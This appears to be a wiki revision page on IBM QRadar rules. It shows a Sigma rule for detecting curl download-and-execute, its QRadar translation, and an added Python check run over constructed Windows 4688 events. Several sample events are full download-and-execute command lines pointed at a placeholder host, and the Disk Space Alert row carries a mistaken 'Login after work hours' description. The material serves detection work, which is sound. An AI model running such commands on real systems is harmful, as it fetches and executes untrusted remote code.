IBM QRadar: Rules: Difference between revisions
Line 27 (unchanged context, present in both revisions):
and when an event is detected by one or more of Netgate pfSense
and when the event QID is one of the following (11xx) pfSense - Login on console
| Login after work hours

Added in this revision (new table row):
Apply Disk Space Alert
and when the event QID is one of the following (38750076) Disk Sentry Disk Usage Exceed Warn Threshold, (38750038) Disk sentry disk usage exceeded threshold
| Login after work hours
Revision as of 18:40, 31 January 2025
A Rule is a group of tests that can trigger an action when specific conditions are met.
Articles
Examples
| Rule | Description |
|---|---|
| Apply Potential Windows Enumeration Detected | Commands hackers use to collect information from MS Windows servers |
| Apply Login After Work Hours | Login after work hours |
| Apply Disk Space Alert | Login after work hours |
Example: (GitHub) Sigma - Curl Download And Execute Combination
```yaml
title: Curl Download And Execute Combination
...
    selection:
        CommandLine|contains|windash: ' -c '
        CommandLine|contains|all:
            - 'curl '
            - 'http'
            - '-o'
            - '&'
    condition: selection
```
And the same detection written as an IBM QRadar rule:
Apply Curl Download And Execute Combination
and when an event matches any of the following BB: Windows Endpoint Events
and when the event matches Event ID is any of 4688
and when the event matches Command (custom) contains all of [/c or curl or http or -o or &]
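As an added example, not code from the wiki page or from the Sigma project: a small Python check that evaluates the Sigma selection above over constructed Windows 4688 events and then applies the QRadar-side Event ID test on top, so the two translations can be compared on the same inputs. The sample events, host name and function names are constructed for this illustration.

```python
"""Added example: evaluate the Sigma selection shown above against constructed
Windows process-creation events, then apply the QRadar Event ID test on top.
All event data below is constructed, not real telemetry."""

# Constructed Event ID 4688 (new process created) events; host name is a placeholder.
SAMPLE_EVENTS = [
    {"EventID": 4688, "CommandLine": "cmd.exe /c curl http://host.invalid/a.exe -o a.exe & a.exe"},
    {"EventID": 4688, "CommandLine": "cmd.exe -c curl http://host.invalid/a.exe -o a.exe & a.exe"},
    {"EventID": 4688, "CommandLine": "CMD.EXE /C CURL HTTP://host.invalid/a.exe -O a.exe & a.exe"},
    {"EventID": 4688, "CommandLine": "cmd.exe /c curl http://host.invalid/readme.txt -o readme.txt"},
    {"EventID": 4689, "CommandLine": "cmd.exe /c curl http://host.invalid/a.exe -o a.exe & a.exe"},
    {"EventID": 4688, "CommandLine": "powershell.exe -c Get-Process & whoami"},
]


def windash_variants(value: str) -> tuple:
    """Sigma 'windash' modifier: the switch also matches when written with a slash."""
    return (value, value.replace(" -", " /"))


def sigma_selection_matches(event: dict) -> bool:
    """The 'selection' block of the Sigma rule above. Sigma string tests are
    case-insensitive, so the command line is lowercased before comparing."""
    cmd = event["CommandLine"].lower()
    # CommandLine|contains|windash: ' -c '  ->  ' -c ' or ' /c '
    has_switch = any(v in cmd for v in windash_variants(" -c "))
    # CommandLine|contains|all: every listed token must be present (AND, not OR)
    has_all = all(tok in cmd for tok in ("curl ", "http", "-o", "&"))
    return has_switch and has_all


def qradar_rule_matches(event: dict) -> bool:
    """The QRadar rule tests: Event ID 4688 plus the command-line tests.
    The Sigma process_creation logsource becomes the Event ID test in QRadar."""
    return event["EventID"] == 4688 and sigma_selection_matches(event)


def matching_indexes(events: list) -> list:
    """Indexes of the events the QRadar rule would fire on."""
    return [i for i, e in enumerate(events) if qradar_rule_matches(e)]


if __name__ == "__main__":
    print(matching_indexes(SAMPLE_EVENTS))  # [0, 1, 2]
```

Event 3 lacks the `&` token and event 5 lacks `curl `, so neither fires; event 4 satisfies the Sigma selection but fails the Event ID test, which is why the QRadar rule needs the 4688 condition in front of the command-line tests.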